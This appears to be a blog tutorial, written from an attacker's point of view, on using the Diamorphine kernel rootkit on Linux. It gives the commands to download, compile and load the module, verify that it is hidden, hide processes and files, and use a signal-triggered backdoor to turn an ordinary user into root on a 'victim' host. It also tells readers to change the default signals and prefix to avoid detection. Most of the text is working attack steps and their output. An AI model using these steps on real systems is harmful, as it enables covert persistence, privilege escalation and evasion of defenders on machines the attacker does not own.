This is how they do it ¯\_(ツ)_/¯

Whenever a hacker breaks in to a system, there are a few steps they take to keep the access without being caught red handed.

Hiding inside the kernel

Many rootkits have been written by very skilled hackers, today we will focus on one of them, my choice of weapon is Diamorphine which is a LKM (Linux Kernel Module)

The choice of weapon

Diamorphine enables overriding of the kernel system calls and enables manipulation of /dev/kmem, allowing an intruder to virtually control the kernel at runtime and monitor every read/write memory operation. It allows for CPU register hooking, facilitates kernel object hooking and allows direct kernel object manipulation.

Lets get started

Verify that the kernel is of a compatible version 2.6.x / 3.x / 4.x

# uname –r
3.10.0-1160.45.1.el7.x86_64

Download, compile and insert the Diamorphine module into the kernel.

# git clone https://github.com/m0nad/Diamorphine.git
# cd Diamorphine
# make && insmod diamorphine.ko

Verify Invisibility

The module starts invisible, but just to make sure… verify that the module is truly hidden:

# cat /proc/modules | grep -i dia
# lsmod | grep -i dia
# kmod list | grep -i dia
# modinfo diamorphine
modinfo: ERROR: Module diamorphine not found.

Kernel Security is Breached

Now that we have breached kernel security, we can start playing around with the functions of the rootkit:

  • Hide/unhide any process by sending a signal 31;
  • Sending a signal 63(to any pid) makes the module become (in)visible;
  • Sending a signal 64(to any pid) makes the given user become root;
  • Files or directories starting with the MAGIC_PREFIX become invisible;

Hidden Processes

Go ahead, pick a number! Hide or unhide a process by issuing the following command:

# kill -31 <your_process_number>

Verify that the process is hidden/unhidden:

# ps waux | grep <your_process_number>

Unhiding and Removing the Kernel Module

The hacker (or the victim) would simply do the following (as root) to remove this rootkit.

Keep in mind that a skilled hacker would not use the default MAGIC_PREFIX or signals as that would be a script-kiddie mistake.

# kill -63 0
# rmmod diamorphine

The hacker becomes the master

With the PID of the shell, the hacker can become root.
Find your bash pid:

% ssh hacker@victim
[hacker@victim ~]$ id
uid=1000(hacker) gid=1000(hacker) groups=1000(hacker) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

[hacker@victim ~]$ ps | grep bash
 1604 pts/1    00:00:00 bash

[hacker@victim ~]$ kill -64 1604
[hacker@victim ~]$ sudo -i
[hacker@victim ~]$ id
uid=0(root) gid=0(root) groups=0(root),1000(hacker) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

Invisible files and directories

So you might wonder what the MAGIC_PREFIX is? The default prefix is “diamorphine_secret”. Lets try it out:

# echo test > /tmp/diamorphine_secret_test
# cat /tmp/diamorphine_secret_test
test

# ls -lsa /tmp/dia*
ls: cannot access /tmp/dia*: No such file or directory